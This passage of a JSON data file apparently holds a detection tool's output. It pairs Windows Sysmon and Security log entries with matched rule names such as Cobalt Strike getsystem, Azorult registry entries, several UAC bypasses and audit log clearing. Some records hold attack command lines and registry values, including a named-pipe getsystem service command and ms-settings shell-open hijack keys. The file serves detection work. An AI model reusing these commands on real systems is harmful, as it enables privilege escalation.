09:46:48.692"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5132,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T09:46:48.726304Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\Start","UtcTime":"2019-04-30 07:46:15.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8573,"Execution":{"#attributes":{"ProcessID":1876,"ThreadID":1444}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T07:46:15.199614Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"cmd.exe /c echo msdhch > \\\\.\\pipe\\msdhch","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\ImagePath","UtcTime":"2019-04-30 
07:46:15.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8574,"Execution":{"#attributes":{"ProcessID":1876,"ThreadID":1444}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T07:46:15.199614Z"}},"Version":2}}}},{"detection":["Meterpreter or Cobalt Strike Getsystem Service Start"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd.exe /c echo msdhch > \\\\.\\pipe\\msdhch","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-F6A1-5CC7-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ParentProcessId":468,"ProcessGuid":"365ABB72-FD47-5CC7-0000-00106AF61D00","ProcessId":4088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 
07:46:15.183"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8575,"Execution":{"#attributes":{"ProcessID":1876,"ThreadID":1444}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T07:46:15.215239Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\Start","UtcTime":"2019-04-30 07:46:15.230"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8576,"Execution":{"#attributes":{"ProcessID":1876,"ThreadID":1444}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T07:46:15.246489Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-03 
12:32:34.721","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-7EE2-5D45-0000-00104E852801","ProcessId":5284,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\MSCOREE.DLL","UtcTime":"2019-08-03 12:32:34.721"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5494,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T12:32:34.875974Z"}},"Version":2}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"IEWIN7","Correlation":null,"EventID":1102,"EventRecordID":18195,"Execution":{"#attributes":{"ProcessID":780,"ThreadID":3812}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T17:10:06.342445Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"},"SubjectDomainName":"IEWIN7","SubjectLogonId":"0x1371b","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"}}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-09 02:52:18.765","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-9570-5CD3-0000-00103FC90A00","ProcessId":1900,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\wscript.exe.manifest","UtcTime":"2019-05-09 02:52:18.765"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":11219,"Execution":{"#attributes":{"ProcessID":1988,"ThreadID":228}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-09T02:52:18.765888Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2018-01-03 01:21:25.726","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"365ABB72-95E7-5CD3-0000-001046950F00","ProcessId":2812,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData:tghjx5xz2ky.vbs","UtcTime":"2019-05-09 
02:52:23.500"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":11241,"Execution":{"#attributes":{"ProcessID":1988,"ThreadID":228}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-09T02:52:23.500263Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5E6A-5D45-0000-001076639D00","ProcessId":4440,"RuleName":"PrivEsc - UAC bypass UACME-33","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-03 10:14:02.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5272,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T10:14:02.929209Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event 
Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5E6A-5D45-0000-001076639D00","ProcessId":4440,"RuleName":"PrivEsc - UAC bypass UACME-33","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command\\(Default)","UtcTime":"2019-08-03 10:14:02.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5273,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T10:14:02.934826Z"}},"Version":2}}}},{"detection":["Bypass UAC via Fodhelper.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\fodhelper.exe\" 
","ParentImage":"C:\\Windows\\System32\\fodhelper.exe","ParentProcessGuid":"747F3D96-5E6F-5D45-0000-001014CA9D00","ParentProcessId":8180,"ProcessGuid":"747F3D96-5E70-5D45-0000-0010FCDD9D00","ProcessId":3656,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-03 10:14:08.401"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5277,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T10:14:08.472102Z"}},"Version":5}}}},{"detection":["UAC Bypass Tool UACMe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\Akagi64.exe\" 64","Company":"Integrity Investment LLC","CurrentDirectory":"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\","Description":"Pentesting utility","FileVersion":"3.5.1.2010","Hashes":"SHA1=4DFA874CE545B22B3AAFF93BD143C6E463996698,MD5=661D7257C25198B973361117467616BE,SHA256=870691CFC9C98866B2AF2E7E48ED5FD5F1D14CFE0E3E9C630BC472FC0A013D0B,IMPHASH=F31CA5C7DD56008F53D4F3926CF37891","Image":"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\Akagi64.exe","IntegrityLevel":"Medium","LogonGuid":"23F38D93-AE9B-5F8E-8CED-170000000000","LogonId":"0x17ed8c","OriginalFileName":"Akagi.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" 
","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"23F38D93-AF70-5F8E-1E02-000000000C00","ParentProcessId":5592,"ProcessGuid":"23F38D93-CF1E-5F8E-C808-000000000C00","ProcessId":8712,"Product":"UACMe","RuleName":"technique_id=T1059.001,technique_name=PowerShell","TerminalSessionId":2,"User":"DESKTOP-NTSSLJD\\den","UtcTime":"2020-10-20 11:50:54.800"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":1,"EventRecordID":622,"Execution":{"#attributes":{"ProcessID":7212,"ThreadID":9748}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-20T11:50:54.810152Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using IEInstal - File","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-20 11:50:55.442","Image":"C:\\Program Files\\Internet Explorer\\IEInstal.exe","ProcessGuid":"23F38D93-CF1F-5F8E-CA08-000000000C00","ProcessId":8736,"RuleName":"-","TargetFilename":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","UtcTime":"2020-10-20 
11:50:55.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":11,"EventRecordID":768,"Execution":{"#attributes":{"ProcessID":7212,"ThreadID":9748}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-20T11:50:55.450643Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-20 11:50:56.082","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"23F38D93-CF1E-5F8E-C808-000000000C00","ProcessId":8712,"RuleName":"-","TargetFilename":"C:\\Users\\den\\AppData\\Local\\Temp\\[1]consent.exe","UtcTime":"2020-10-20 11:50:56.082"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":11,"EventRecordID":877,"Execution":{"#attributes":{"ProcessID":7212,"ThreadID":9748}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-20T11:50:56.090214Z"}},"Version":2}}}},{"detection":["Suspicious Driver Load from Temp"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Integrity Investment LLC","Description":"UACMe proxy 
DLL","FileVersion":"3.5.1.2010","Hashes":"SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6","Image":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","ImageLoaded":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","OriginalFileName":"Fubuki.dll","ProcessGuid":"23F38D93-CF20-5F8E-CE08-000000000C00","ProcessId":6896,"Product":"UACMe","RuleName":"technique_id=T1073,technique_name=DLL Side-Loading","Signature":"-","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-10-20 11:50:56.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":7,"EventRecordID":964,"Execution":{"#attributes":{"ProcessID":7212,"ThreadID":5064}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-20T11:50:56.531639Z"}},"Version":3}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-03 10:51:46.599","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-6742-5D45-0000-00104A66B500","ProcessId":6380,"RuleName":"PrivEsc - UAC Bypass UACME 32","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\OskSupport.dll","UtcTime":"2019-08-03 
10:51:46.599"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5305,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T10:51:46.647421Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Windows\\System32\\cmd.exe /c notepad.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-88DC-5CD3-0000-00100DA51A00","ProcessId":2704,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\exefile\\shell\\runas\\command\\IsolatedCommand","UtcTime":"2019-05-09 02:07:51.100"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11122,"Execution":{"#attributes":{"ProcessID":1980,"ThreadID":1904}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-09T02:07:51.116072Z"}},"Version":2}}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /c notepad.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 
(win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-863B-5CD3-0000-00204A390100","LogonId":"0x1394a","ParentCommandLine":"?","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"365ABB72-8B77-5CD3-0000-0010E8FD2900","ParentProcessId":3836,"ProcessGuid":"365ABB72-8B80-5CD3-0000-001065512A00","ProcessId":2264,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 02:08:00.336"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11126,"Execution":{"#attributes":{"ProcessID":1980,"ThreadID":1904}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-09T02:08:00.446150Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"alice.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":25048,"Execution":{"#attributes":{"ProcessID":748,"ThreadID":6064}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-11-15T08:19:02.298512Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"insecurebank","SubjectLogonId":"0x1c363a4","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-1005675359-741490361-30848483-1108"}}}}},{"detection":["Windows Spooler Service Suspicious Binary Load"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"Microsoft Application Virtualization Terminator","FileVersion":"10.0.18362.1 (WinBuild.160101.0800)","Hashes":"SHA1=D66B48C663F435419913D65E64ED4845CB9BC882,MD5=0419B6B1CCE7FA295A3DC1823E0AD685,SHA256=60BCF03195AE55304114E4AECD800C15C3F15DDDC91B742B4F5A9624494CCA65,IMPHASH=F578F8B5F8EA1AA29D7B69CDB8565B2E","Image":"C:\\Windows\\System32\\spoolsv.exe","ImageLoaded":"C:\\Windows\\System32\\AppVTerminator.dll","ProcessGuid":"6A3C3EF2-8168-5FBF-0000-0010435A0100","ProcessId":2032,"Product":"Microsoft® Windows® Operating System","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-11-26 
10:45:07.672"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":7,"EventRecordID":343368,"Execution":{"#attributes":{"ProcessID":8124,"ThreadID":7540}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-11-26T10:45:07.686999Z"}},"Version":3}}}},{"detection":["Windows Spooler Service Suspicious Binary Load"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=4B0D3EF916C4D5E4249DC62E0A1A2307C495E3FB,MD5=C957DB23045704214C1A53260598FC85,SHA256=7C1B045BB80761F9E9EDD9B8B7A53D9C374CA0C78926F7AEE1EACCC32EC3B198,IMPHASH=8DEF796746DD54062D5B3186EEF39356","Image":"C:\\Windows\\System32\\spoolsv.exe","ImageLoaded":"C:\\Windows\\System32\\spool\\drivers\\x64\\4\\payload.dll","ProcessGuid":"6A3C3EF2-8739-5FBF-0000-001075514700","ProcessId":8716,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-11-26 10:45:23.976"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":7,"EventRecordID":343371,"Execution":{"#attributes":{"ProcessID":8124,"ThreadID":7540}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-11-26T10:45:24.216387Z"}},"Version":3}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
